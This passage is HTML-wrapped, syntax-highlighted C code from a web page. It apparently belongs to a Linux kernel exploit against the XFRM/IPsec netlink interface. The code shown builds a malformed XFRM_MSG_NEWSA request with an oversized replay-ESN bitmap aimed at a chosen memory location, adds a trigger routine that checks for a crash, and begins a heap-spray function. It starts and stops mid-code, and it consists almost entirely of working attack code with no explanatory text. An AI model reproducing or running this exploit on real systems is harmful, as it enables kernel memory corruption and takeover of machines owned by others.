class=\"crayon-e\">in_addr_t <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-99\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xfrm_mark <\/span><span class=\"crayon-v\">mark<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-100\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_algo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-101\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-102\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">size_t <\/span><span class=\"crayon-v\">esn_size<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-104\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-105\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-106\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;malloc&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-107\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-108\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-109\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-110\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_MSG_NEWSA<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-111\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_REQUEST<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">NLM_F_CREATE<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">NLM_F_EXCL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-112\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLMSG_LENGTH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_usersa_info<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-113\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">soft_byte_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-114\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">hard_byte_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-115\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">soft_packet_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-116\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">lft<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">hard_packet_limit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_INF<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-117\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-m\">mode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_MODE_TUNNEL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-118\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_STATE_ESN<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-119\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-120\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">inet_addr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-121\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">inet_addr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-122\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-123\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_INET6<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-124\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-125\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/r-&gt;xsinfo.saddr.a4 = src;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-126\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/r-&gt;xsinfo.id.daddr.a4 = dst;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-127\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">a6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-128\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">a6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-129\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">proto<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPPROTO_AH<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-130\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">spi<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12345<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-131\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">XFRMA_MARK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">mark<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mark<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-132\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-133\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_algo<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-134\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-135\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;algo allocation&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-136\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-137\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-138\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_name<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-139\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;hmac(sha256)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-140\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_key_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-141\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">strncpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_key<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;12345678901234567890123456789012&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-142\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">XFRMA_ALG_AUTH<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_algo<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">33<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-143\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-144\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* build ens *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-145\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">esn_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-146\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-147\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-148\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* This is mandatory, in order to let the kernel parse the nlattr structure<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-149\"><span class=\"crayon-c\">\t * if we want to use a specific memory location, we must allocate a memory<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-150\"><span class=\"crayon-c\">\t * with size=target address , which is a 32-bit value<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-151\"><span class=\"crayon-c\">\t *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-152\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">bmp_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-153\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-154\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">XFRMA_REPLAY_ESN_VAL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">esn_size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-155\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-156\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-157\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-158\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-159\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-160\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-161\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trigger<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-162\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/proc\/sys\/net\/core\/somaxconn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">O_RDONLY<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-163\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-164\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;See crash ? n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-165\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-166\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-167\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">u_int8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int32_t <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iter<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-168\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-169\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-170\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newae<\/span><span class=\"crayon-h\"> <\/span><span 